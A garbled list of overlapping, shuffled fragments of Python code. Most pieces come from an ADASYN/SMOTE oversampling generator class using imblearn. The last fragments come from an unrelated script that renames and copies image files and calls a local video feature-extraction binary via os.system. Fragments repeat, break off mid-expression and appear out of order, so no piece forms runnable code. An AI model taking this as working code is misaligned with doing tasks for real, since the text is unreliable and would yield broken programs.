Gen_adasyn: def __init__(self):", "else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ #", "smaller than the number of observations in train\") parss = 'all' y =", "= 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2 if 
type(Xnew)", "= 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples", "return self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples:", "not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y", "np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5,", "np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y =", "if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples,", "SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\"", "np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew =", "Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew)", "None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not", "= parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\"", "and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy", "majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than the", "= n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect", "try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X,", "X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples =", "= SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ =", "= parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE", "= \"adasyns\" else: self.mname_ = 
\"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return", "# ============================================================================= # # TEST # # from sklearn.datasets import make_classification # X,", "size is smaller than the number of observations in train\") parss = 'all'", "'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples =", "y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples)))", "np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) #", "Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0], df[:,1]) #", "n_classes = 1, # random_state = 0) # import matplotlib.pyplot as plt #", "Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y)", "min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state", "type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0])", "1, # random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1])", "= np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0])", "Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y)", "parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_,", "plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples", "y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss = 'not", "self.X_.shape[0]) # TODO Inspect while 
type(Xnew) is not np.ndarray and parknn <= n_samples", "y = make_classification(n_samples = 100, n_features = 2, n_informative = 2, # n_redundant", "observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y)", "and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors =", "return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST", "parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray", "in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X", "X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples,", "self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state =", "(ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is not np.ndarray: from", "2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5,", "random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # #", "= parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else:", "= 1, # random_state = 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0],", "\"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self,", "make_classification(n_samples = 100, n_features = 2, n_informative = 2, # n_redundant = 0,", "= np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn =", "src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\"", "import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss,", "TEST # # from 
sklearn.datasets import make_classification # X, y = make_classification(n_samples =", "= min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn,", "plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df", "train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X =", "than the number of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]),", "parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy =", "n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state =", "self.X_ = X.copy() return self def sample(self, n_samples=1): parss = 'not majority' if", "# ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) #", "Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self,", "required sample size is smaller than the number of observations in train\") parss", "= parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn *", "parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2", "import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_", "self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ =", "1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST # # from", "0, n_classes = 1, # random_state = 0) # import matplotlib.pyplot as plt", "is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew,", "2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:]", "# n_redundant = 0, n_repeated = 0, n_classes = 1, # random_state =", "numpy 
as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu", "except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is not np.ndarray:", "# import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn()", "import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def", "self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self):", "= \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def", "make_classification # X, y = make_classification(n_samples = 100, n_features = 2, n_informative =", "None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return", "while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]:", "= 100, n_features = 2, n_informative = 2, # n_redundant = 0, n_repeated", "self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self", "warnings.warn(\"The required sample size is smaller than the number of observations in train\")", "X.copy() return self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] >", "= make_classification(n_samples = 100, n_features = 2, n_informative = 2, # n_redundant =", "> n_samples: warnings.warn(\"The required sample size is smaller than the number of observations", "y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn", "n_features = 2, n_informative = 2, # n_redundant = 0, n_repeated = 0,", "# TODO Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples and", "type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try:", "Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO", "the number of observations in 
train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples)", "Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None,", "# plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df =", "2, # n_redundant = 0, n_repeated = 0, n_classes = 1, # random_state", "from sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100, n_features =", "warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_", "def my_name(self): return self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets", "not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y", "__init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_", "0, n_repeated = 0, n_classes = 1, # random_state = 0) # import", "imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy =", "if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than the number", "fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss", "0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen =", "= 2, # n_redundant = 0, n_repeated = 0, n_classes = 1, #", "\"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # #", "self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets import make_classification #", "n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and parknn <=", "is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, 
self.X_.shape[0]) Xnew,", "def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required", "= np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew", "np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None", "np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y =", "<= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state", "= 0, n_repeated = 0, n_classes = 1, # random_state = 0) #", "2, n_informative = 2, # n_redundant = 0, n_repeated = 0, n_classes =", "= None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy()", "= 0, n_classes = 1, # random_state = 0) # import matplotlib.pyplot as", "n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size", "parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn =", "np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn:", "random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2 if", "2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is", "100, n_features = 2, n_informative = 2, # n_redundant = 0, n_repeated =", "parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn,", "= None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is", "self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # =============================================================================", "n_samples: 
warnings.warn(\"The required sample size is smaller than the number of observations in", "RuntimeError): parknn = parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling", "import numpy as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import", "n_redundant = 0, n_repeated = 0, n_classes = 1, # random_state = 0)", "* 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn =", "n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors", "as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) #", "from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ =", "k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ =", "= parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn", "parknn = parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import", "Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST #", "== 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST # #", "= 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen", "matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X)", "n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while", "# X, y = make_classification(n_samples = 100, n_features = 2, n_informative = 2,", "n_informative = 2, # n_redundant = 0, n_repeated = 0, n_classes = 1,", "as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class", "parknn * 2 if type(Xnew) is not np.ndarray: 
from imblearn.over_sampling import SMOTE parknn", "<= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss,", "n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn", "def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None):", "= Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0], df[:,1])", "import make_classification # X, y = make_classification(n_samples = 100, n_features = 2, n_informative", "= X.copy() return self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0]", "def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1):", "min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and parknn", "y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except" ]
[ "True: j = random.randint(0 , 119) if i != j: break while True:", "119) while True: j = random.randint(0 , 119) if i != j: break", "m != l: break return i , j , z , k ,", "random.randint(0 , 119) if z != i and z != j: break k", "= random.randint(0 , 119) if z != i and z != j: break", "i and z != j: break k = random.randint(0 ,2) while True: l", "random.randint(0 , 119) if i != j: break while True: z = random.randint(0", "initializer(): i = random.randint(0 , 119) while True: j = random.randint(0 , 119)", ", 119) while True: j = random.randint(0 , 119) if i != j:", "if l != k: break while True: m = random.randint(0 , 2) if", "!= l: break return i , j , z , k , l", "import random def initializer(): i = random.randint(0 , 119) while True: j =", "def initializer(): i = random.randint(0 , 119) while True: j = random.randint(0 ,", ",2) while True: l = random.randint(0 , 2) if l != k: break", "l != k: break while True: m = random.randint(0 , 2) if m", "True: m = random.randint(0 , 2) if m != k and m !=", "k and m != l: break return i , j , z ,", ", 119) if z != i and z != j: break k =", "= random.randint(0 , 2) if m != k and m != l: break", "while True: l = random.randint(0 , 2) if l != k: break while", "i = random.randint(0 , 119) while True: j = random.randint(0 , 119) if", "= random.randint(0 , 119) while True: j = random.randint(0 , 119) if i", "break while True: z = random.randint(0 , 119) if z != i and", "random.randint(0 ,2) while True: l = random.randint(0 , 2) if l != k:", "<gh_stars>1-10 import random def initializer(): i = random.randint(0 , 119) while True: j", "break return i , j , z , k , l , m", "2) if l != k: break while True: m = random.randint(0 , 2)", "break k = random.randint(0 ,2) while True: l = random.randint(0 , 2) if", ", 2) if m != k and m != l: break return i", "k = random.randint(0 ,2) while True: l = random.randint(0 , 2) if l", "and z != j: break k = random.randint(0 ,2) while True: l =", "!= j: break k = random.randint(0 ,2) while True: l 
= random.randint(0 ,", "random.randint(0 , 2) if m != k and m != l: break return", "l = random.randint(0 , 2) if l != k: break while True: m", "l: break return i , j , z , k , l ,", "random.randint(0 , 119) while True: j = random.randint(0 , 119) if i !=", ", 119) if i != j: break while True: z = random.randint(0 ,", "= random.randint(0 , 119) if i != j: break while True: z =", "if i != j: break while True: z = random.randint(0 , 119) if", "119) if z != i and z != j: break k = random.randint(0", "True: l = random.randint(0 , 2) if l != k: break while True:", "!= k and m != l: break return i , j , z", "while True: z = random.randint(0 , 119) if z != i and z", "and m != l: break return i , j , z , k", ", 2) if l != k: break while True: m = random.randint(0 ,", "z = random.randint(0 , 119) if z != i and z != j:", "break while True: m = random.randint(0 , 2) if m != k and", "if m != k and m != l: break return i , j", "!= i and z != j: break k = random.randint(0 ,2) while True:", "= random.randint(0 , 2) if l != k: break while True: m =", "j: break k = random.randint(0 ,2) while True: l = random.randint(0 , 2)", "!= k: break while True: m = random.randint(0 , 2) if m !=", "z != j: break k = random.randint(0 ,2) while True: l = random.randint(0", "while True: m = random.randint(0 , 2) if m != k and m", "i != j: break while True: z = random.randint(0 , 119) if z", "random def initializer(): i = random.randint(0 , 119) while True: j = random.randint(0", "= random.randint(0 ,2) while True: l = random.randint(0 , 2) if l !=", "while True: j = random.randint(0 , 119) if i != j: break while", "if z != i and z != j: break k = random.randint(0 ,2)", "m != k and m != l: break return i , j ,", "j: break while True: z = random.randint(0 , 119) if z != i", "!= j: break while True: z = random.randint(0 , 119) if z !=", "m = random.randint(0 , 2) if m != k and m != l:", "k: break while True: m = random.randint(0 , 2) if m != k", "2) if m != k and m != l: break return i ,", "119) if i 
!= j: break while True: z = random.randint(0 , 119)", "j = random.randint(0 , 119) if i != j: break while True: z", "z != i and z != j: break k = random.randint(0 ,2) while", "random.randint(0 , 2) if l != k: break while True: m = random.randint(0", "True: z = random.randint(0 , 119) if z != i and z !=" ]
[ "-1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd =", "\"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith", "= [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname =", "copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash", "get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file =", "open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split('", "feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list):", "names = [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname", "/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow '", "+ ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] +", "= get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time =", "+ os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) +", 
"/opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction", "\"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i,", "[] for dirpath, dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix):", "/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def", "start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir):", "+ '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[", "\" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash'", "dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return", "- start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def", "' + img_path + '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin", "def feature_generator_query(target_dir): ''' 
根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith /", "in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name,", "feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return:", "= '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len( img_names)) +", "print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir:", "import os import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f", "item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile", "as name_file: name_file.writelines(names) print \"extracting feature from image No. %d , %d dirs", "img_path + '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin '", "print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin", "/ :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs =", "exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print", "'_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image No. 
%d ,", "= [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in", "/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \"", "[] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp:", "'/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print", "list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img", "with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append(", "os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!! attation!\" return -1", "in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def", "get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path): for name", "feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\"", "print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' +", "time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print", "image No. 
%d , %d dirs in total\" % ((i + 1), len(dir_child_list))", "f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if", "extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt", "for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir):", "in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in", "-1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w')", "name_file.writelines(names) print \"extracting feature from image No. 
%d , %d dirs in total\"", "os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not", "print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path", "for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j", "extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\"", "dirpath, dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name))", "name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs", "enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname", "import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)]", "= os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names", "newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\")", "targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for", "'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs',", "def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print", "if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with", "os.path.dirname( img_path) + '/' + 
